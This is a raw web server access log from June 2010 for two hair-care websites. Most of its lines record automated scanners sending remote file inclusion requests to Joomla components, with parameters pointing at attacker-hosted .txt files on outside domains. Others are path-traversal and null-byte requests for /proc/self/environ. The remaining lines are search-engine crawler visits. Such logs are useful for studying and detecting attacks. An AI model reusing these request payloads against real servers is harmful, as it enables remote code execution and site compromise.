125.249.199.195 - - [21/Jun/2010:00:49:21 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.249.199.195 - - [21/Jun/2010:00:49:21 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.142.75.205 - - [21/Jun/2010:00:49:25 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.75.205 - - [21/Jun/2010:00:49:25 -0700] "GET /logs/access_100531.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.142.75.205 - - [21/Jun/2010:00:49:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.249.199.195 - - [21/Jun/2010:00:49:51 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.249.199.195 - - [21/Jun/2010:00:49:52 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.249.199.195 - - [21/Jun/2010:00:49:52 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:07 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:07 -0700] "GET /logs/access_100503.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:09 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:09 -0700] "GET /logs/access_100503.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:51:10 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.75.205 - - [21/Jun/2010:00:52:06 -0700] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:00:53:24 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:53:26 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:53:26 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:53:29 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:53:29 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:00:53:29 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:00:53:40 -0700] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
195.190.166.35 - - [21/Jun/2010:00:53:40 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
195.190.166.35 - - [21/Jun/2010:00:53:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
208.80.193.121 - - [21/Jun/2010:00:54:40 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.8.6)" "growlonghairfast.com"
195.190.166.35 - - [21/Jun/2010:00:54:57 -0700] "GET /logs/access_100222.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:00:54:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:00:54:57 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:00:55:39 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.190.166.35 - - [21/Jun/2010:00:55:58 -0700] "GET /logs/access_100125.log%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
174.142.75.205 - - [21/Jun/2010:00:58:16 -0700] "GET /logs/access_100531.log%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:58:39 -0700] "GET /logs/access_100426.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:58:39 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:58:39 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.75.205 - - [21/Jun/2010:00:58:48 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.142.75.205 - - [21/Jun/2010:00:58:48 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:00:59:13 -0700] "GET /logs/access_100426.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:59:14 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:59:14 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:59:32 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:59:32 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:00:59:32 -0700] "GET /logs/access_100426.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:01:00:08 -0700] "GET /logs/access_100426.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:01:00:08 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:01:00:08 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [21/Jun/2010:01:00:59 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:05 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:33 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:33 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:01:01:34 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
62.44.82.61 - - [21/Jun/2010:01:01:34 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:01:01:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:01:01:35 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
62.44.82.61 - - [21/Jun/2010:01:01:47 -0700] "GET /logs/access.log//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:48 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:48 -0700] "GET /logs//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:57 -0700] "GET /logs/access.log//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:57 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:01:57 -0700] "GET /logs//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6091 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:02:09 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:02:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:02:25 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.61 - - [21/Jun/2010:01:02:45 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
119.63.198.100 - - [21/Jun/2010:01:04:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14501 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:01:04:40 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:01:04:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:01:04:40 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:05:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12865 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:15:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13426 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:17:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18786 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:01:24:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15050 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.65.240 - - [21/Jun/2010:01:32:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
208.80.193.29 - - [21/Jun/2010:01:33:28 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990)" "freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:35:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7458 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
207.46.13.85 - - [21/Jun/2010:01:35:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
207.46.13.85 - - [21/Jun/2010:01:36:13 -0700] "GET /index.html HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:43:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13519 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:44:40 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:01:47:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12514 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:01:47:24 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [21/Jun/2010:01:47:24 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:06 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:06 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:07 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:14 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:14 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:14 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:20 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:20 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:20 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:22 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:22 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:22 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:37 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:37 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:37 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:59 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
